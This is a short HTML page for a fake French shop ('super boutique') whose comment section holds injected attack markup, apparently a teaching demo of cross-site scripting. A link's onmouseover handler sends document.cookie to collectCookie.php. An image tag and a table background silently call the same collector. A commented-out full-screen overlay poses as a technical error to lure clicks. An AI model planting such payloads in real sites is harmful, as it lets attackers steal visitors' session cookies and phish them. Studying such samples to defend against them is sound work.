<html>
<head><title>super boutique</title></head>
<body>
<h2>details produits....</h2>
<div id="comment">
	<a href="collectCookie.php">fantastique offre commerciale</a><br />
	<a href="boutique.php"
		onmouseover="window.location='collectCookie.php?cookie=' + document.cookie;">
	vous n'allez pas le croire</a><br />
	<img src="collectCookie.php?toto=5" />
	<table background="collectCookie.php?toto=8">
	</table>
	<!-- <div style="position: absolute; top: 0px; left; 0px; background-color: pink; width: 100%; height: 100%">
		<h1>désolé, un probleme technique est survenu</h1>
		<a href="collectCookie.php?toto=15">cliquez ici pour reprendre</a>
	</div> -->
</div>
</body>
</html>
